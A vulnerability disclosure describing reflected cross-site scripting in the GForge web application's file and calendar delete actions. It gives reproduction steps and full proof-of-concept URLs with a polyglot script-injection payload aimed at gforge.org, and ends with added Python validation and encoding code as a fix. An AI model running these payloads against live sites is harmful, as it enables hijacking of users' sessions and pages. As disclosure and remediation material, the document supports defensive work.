This is for Joomla Developers: XSS in GForge App

Hacker “Sony” discovered a cross-site scripting (XSS) vulnerability in the GForge web application. GForge is a free software fork of the web-based project-management and collaboration software originally created for SourceForge, called Savane. GForge provides project hosting, version control (CVS and Subversion), bug tracking, and messaging. The hacker created two accounts for testing and found XSS in the files, calendar, message wall (search users) and blogs features. The vulnerability description follows.

XSS using Files:
After creating a fake account, upload a file.

It will be available at this location:
http://gforge.org/gf/user/eleo/userfiles/

Then press the delete button, open the link in a new window and append the XSS payload to the URL:

http://gforge.org/gf/user/eleo/userfiles/my/admin/?action=UserfileDelete&file_id=3089%5Bour xss is here]

PoC:
http://gforge.org/gf/user/eleo/userfiles/my/admin/?action=UserfileDelete&file_id=3089%27;alert%28String.fromCharCode%2888,83,83%29%29//%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//–%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E

XSS in Calendar:

Open the calendar, press the “add new event” button, then press the delete button, open the link in a new window and append the XSS payload to the URL:

http://gforge.org/gf/user/eleo/usercalendar/my/?action=UsercalendarEventDelete&event_id=6&redirect_to=monthview&start_date=1327881600%5Bour xss is here]

PoC:

http://gforge.org/gf/user/eleo/usercalendar/my/?action=UsercalendarEventDelete&event_id=6&redirect_to=monthview&start_date=1327881600%27;alert%28String.fromCharCode%2888,83,83%29%29//%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//–%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E

The vulnerability affects the following sites:

Joomlacode.org and other sites that use the GForge app.
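As an added example (not code from GForge or from the advisory's author), the defensive pattern for the reflected parameters described above: strict integer validation for file_id, event_id and start_date, plus JavaScript-string encoding for anything that really must be echoed into a script block. The hostname gforge.example and the shortened payload are constructed stand-ins for the advisory's URLs.

```python
"""Validation and output encoding for the GForge delete-action parameters.

Added example, not GForge's own code. The advisory shows file_id and
start_date echoed into a <script> block unencoded; both are numeric ids,
so the first defence is strict type validation and the second is
contextual encoding of anything that must be echoed. URLs are constructed.
"""
import json
import re
from urllib.parse import parse_qs, urlsplit

# Reflected parameters named in the advisory; all carry integer values.
INT_PARAMS = ("file_id", "event_id", "start_date")
# Constructed: a valid numeric id followed by an injected script fragment.
POC_URL = ("http://gforge.example/gf/user/eleo/userfiles/my/admin/"
           "?action=UserfileDelete&file_id=3089%27;alert(1)//%3C/SCRIPT%3E")
CLEAN_URL = ("http://gforge.example/gf/user/eleo/userfiles/my/admin/"
             "?action=UserfileDelete&file_id=3089")

def validate_int(value: str) -> int:
    """Accept only a plain decimal integer; anything else is rejected."""
    if not re.fullmatch(r"\d{1,20}", value):
        raise ValueError(f"non-numeric parameter value: {value!r}")
    return int(value)

def check_request(url: str) -> dict:
    """Parse the query string and validate every id-like parameter."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return {name: validate_int(params[name][0])
            for name in INT_PARAMS if name in params}

def is_safe_request(url: str) -> bool:
    """True when every reflected id parameter is a plain integer."""
    try:
        check_request(url)
        return True
    except ValueError:
        return False

def js_string_literal(value: str) -> str:
    """Encode untrusted text for a JS string literal inside <script>.

    json.dumps escapes quotes and backslashes; the extra replacements keep
    '</script>' and HTML-significant characters from ending the block.
    """
    encoded = json.dumps(value)
    for ch, esc in (("<", "\\u003c"), (">", "\\u003e"),
                    ("&", "\\u0026"), ("'", "\\u0027")):
        encoded = encoded.replace(ch, esc)
    return encoded
```

Rejecting the request at validation is the primary fix; the encoder is the fallback for any place where a free-form value has to be written into inline JavaScript.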
